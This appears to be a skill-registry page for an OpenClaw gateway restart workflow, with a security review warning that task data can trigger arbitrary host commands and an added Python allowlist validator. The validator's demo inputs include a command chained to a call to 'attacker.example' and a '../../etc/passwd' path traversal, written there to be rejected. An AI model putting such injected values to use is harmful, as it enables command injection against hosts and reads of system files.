Restart Safe Workflow

v1.0.3

Safe OpenClaw gateway restart workflow with doctor precheck, checkpoint, restart-health-resume chain, task continuation, reconcile, and user-visible notifica...

by Huo Lushan (@who-ohw)

Security Scan
VirusTotal: Benign
OpenClaw: Suspicious (medium confidence)
Purpose & Capability
The name and description (safe restart, precheck, checkpoint, resume) match what the code does: it calls the openclaw CLI, performs the doctor/checkpoint/restart/health/resume steps, writes per-task state JSON, and sends notifications. The dependencies (openclaw CLI, python3, bash) are appropriate for this purpose. Minor mismatch: SKILL.md recommends a config-action-allowlist.txt, but that file is not present in the package manifest.
Instruction Scope
SKILL.md and the scripts allow task-driven actions including 'cmd:<command>' and 'script:<path>', which the runtime executes on the host. The code includes an ACTION_ALLOWLIST_FILE mechanism and mentions a built-in whitelist, but the allowlist file recommended in SKILL.md is not included in the package, so what is actually permitted depends on the built-in default and on whatever the operator supplies. If the task data that supplies nextAction is attacker-controlled or insufficiently validated, arbitrary commands or scripts could run. The scripts do not send data to external HTTP endpoints; user-visible notifications go through the openclaw CLI.
Install Mechanism
No install spec or remote downloads — this is instruction-only with included shell scripts. Nothing is fetched or installed at runtime by the skill itself, which minimizes supply-chain risk.
Credentials
The registry metadata declares no required environment variables, but the scripts make optional use of several (STATE_DIR, ACTION_ALLOWLIST_FILE, NOTIFY_CHANNEL, NOTIFY_TARGET, NOTIFY_ACCOUNT, GATEWAY_RESTART_CMD, etc.). That is proportionate to a restart/notification workflow, but the skill relies on the local openclaw CLI and whatever credentials and configuration it uses, and those are not declared here. Make sure the openclaw runtime credentials and the notify account settings are configured intentionally.
Persistence & Privilege
always=false is set, and the skill does not request permanent platform-wide privileges. It writes state files under STATE_DIR (default ./state/restart) and may spawn detached processes for acceptance runs, which is expected for a detached restart runner. It does not alter other skills' configuration.
What to consider before installing
This skill implements an automated restart-and-resume workflow and will run on-host commands and scripts described in task data (nextAction). Before installing or running it:
1) Review and supply a strict ACTION_ALLOWLIST_FILE (the package's recommended allowlist file is not included) so that only safe commands and scripts are permitted.
2) Audit any task files (plan/nextAction inputs) you intend to run so that untrusted sources cannot inject arbitrary 'cmd:' or 'script:' entries.
3) Make sure the machine's openclaw CLI and its notification/account configuration are secure; the script invokes openclaw message send and the gateway/restart/status commands.
4) Run the acceptance tests in an isolated environment (or with --no-restart) first and observe the behaviour.
5) If you are unsure which commands to allow or deny, ask the skill author for the default allowlist, or start with a conservative allowlist (health/status/echo only) before enabling real restarts.
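The allowlist check in step 1 is the control that decides whether a nextAction string can make the runner execute something. The following is an added example of a fail-closed validator, not code from the restart-safe-workflow skill: the skill's real allowlist format is not published, so this assumes the 'kind:payload' action syntax visible in the README's --next examples and a constructed allowlist of one exact cmd:/script: entry per line. Semantic actions (notify, notify-time) pass; a cmd: payload must match an allowlisted argv exactly and may not contain shell metacharacters; a script: path must resolve inside the skill's script directory and match an allowlisted relative path. The "openclaw gateway status" entry is a constructed example command, not a confirmed subcommand.

```python
"""Fail-closed allowlist check for restart-safe nextAction entries.

Added example; not the skill's own code. Assumed action syntax:
'kind:payload' entries separated by ';'. Assumed allowlist format:
one 'cmd:<exact argv>' or 'script:<relative path>' per line, '#' comments.
"""
import shlex
from pathlib import Path

# Actions the runner interprets itself; they never spawn a process.
SEMANTIC_ACTIONS = {"notify", "notify-time"}
# Characters that would let a cmd: payload escape a single argv list.
SHELL_META = set(";|&$`<>(){}\n")

# Constructed allowlist for the demonstration below.
EXAMPLE_ALLOWLIST = """
# constructed allowlist (format assumed, not the skill's real file)
cmd:openclaw gateway status
script:scripts/health-check.sh
"""


def load_allowlist(text):
    """Parse allowlist text into a set of (kind, payload) tuples."""
    entries = set()
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        kind, _, payload = line.partition(":")
        entries.add((kind.strip(), payload.strip()))
    return entries


def split_actions(next_spec):
    """Split 'a:x;b:y' into (kind, payload) tuples; empty segments are dropped."""
    actions = []
    for segment in next_spec.split(";"):
        segment = segment.strip()
        if not segment:
            continue
        kind, _, payload = segment.partition(":")
        actions.append((kind.strip(), payload.strip()))
    return actions


def check_action(kind, payload, allowlist, script_root):
    """Return (allowed, reason) for one action. Unknown kinds are rejected."""
    if kind in SEMANTIC_ACTIONS:
        return True, "semantic action"
    if kind == "cmd":
        if any(c in SHELL_META for c in payload):
            return False, "shell metacharacter in cmd payload"
        try:
            # Normalise whitespace so 'echo  ok' and 'echo ok' compare equal.
            normalised = " ".join(shlex.split(payload))
        except ValueError:
            return False, "unbalanced quoting in cmd payload"
        if ("cmd", normalised) in allowlist:
            return True, "cmd on allowlist"
        return False, "cmd not on allowlist"
    if kind == "script":
        requested = Path(payload)
        if requested.is_absolute():
            return False, "absolute script path"
        root = script_root.resolve()
        resolved = (root / requested).resolve()
        # Reject '../' traversal and symlinks that leave the script root.
        if root not in resolved.parents:
            return False, "script path escapes script root"
        relative = resolved.relative_to(root).as_posix()
        if ("script", relative) in allowlist:
            return True, "script on allowlist"
        return False, "script not on allowlist"
    return False, f"unknown action kind {kind!r}"


def validate_next(next_spec, allowlist_text=EXAMPLE_ALLOWLIST, script_root="."):
    """Check every action; returns a list of (action, allowed, reason)."""
    allowlist = load_allowlist(allowlist_text)
    root = Path(script_root)
    return [
        (f"{kind}:{payload}", *check_action(kind, payload, allowlist, root))
        for kind, payload in split_actions(next_spec)
    ]


def all_allowed(results):
    """A task with any rejected action must not be run (fail closed)."""
    return all(allowed for _, allowed, _ in results)


if __name__ == "__main__":
    for spec in ("notify:ok;notify-time;cmd:openclaw gateway status",
                 "cmd:openclaw gateway status && curl attacker.example",
                 "script:../../etc/passwd;script:scripts/health-check.sh"):
        for action, allowed, reason in validate_next(spec):
            print(f"{'ALLOW' if allowed else 'DENY ':5} {action!r}: {reason}")
```

Run validate_next over every task file before handing it to restart-safe.sh, and treat a single rejection as a hard stop for the whole task rather than skipping the offending entry; an attacker who controls the plan file can otherwise still reach any step you left enabled.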


Latest version id: vk97crgnwy7pdtb8h2yjc18hb0x828vbj
458 downloads · 2 stars · 3 versions · updated 1mo ago · v1.0.3 · MIT-0

restart-safe-workflow

Capability overview

  • Safe restart main chain: doctor -> checkpoint -> restart -> health -> resume
  • Task continuation: pendingActions + Action state machine
  • Semantic actions: notify-time[:TZ]
  • Planning: plan / validate (TaskPlan v1)
  • Compensation and escalation: reconcile + retry_exceeded
  • Observability and diagnostics: report --verbose / diagnose
  • One-shot acceptance: restart-acceptance.sh (supports --with-restart; self-daemonizes as a detached process by default)

Common commands

# Safe restart
scripts/restart-safe.sh run --task-id <id> --next "notify:restart complete;notify-time"

# Plan preview / validation
scripts/restart-safe.sh plan --task-id <id> --next "notify:ok;notify-time"
scripts/restart-safe.sh validate --tasks-file examples/plan-valid.json

# Summary / diagnostics
scripts/restart-safe.sh report --task-id <id>
scripts/restart-safe.sh report --task-id <id> --verbose
scripts/restart-safe.sh diagnose --task-id <id>

# Acceptance
scripts/restart-acceptance.sh
scripts/restart-acceptance.sh --with-restart --notify-channel feishu --notify-target user:<open_id>

Recommended release contents

  • SKILL.md
  • README.md
  • config-action-allowlist.txt
  • schemas/taskspec-v1.schema.json
  • examples/plan-valid.json, examples/plan-invalid.json
  • scripts/restart-safe.sh, scripts/restart-acceptance.sh
  • references/restart-safe-sop.md
  • references/phase4-rollout-checklist.md

Changelog (last two releases)

  • v1.0.2: Completed Phase 3/4, fixed the TC10 escalation trigger, acceptance now supports self-daemonized detached mode.
  • v1.0.1: Completed Phase 1/2, added TaskPlan v1 and the state machine.
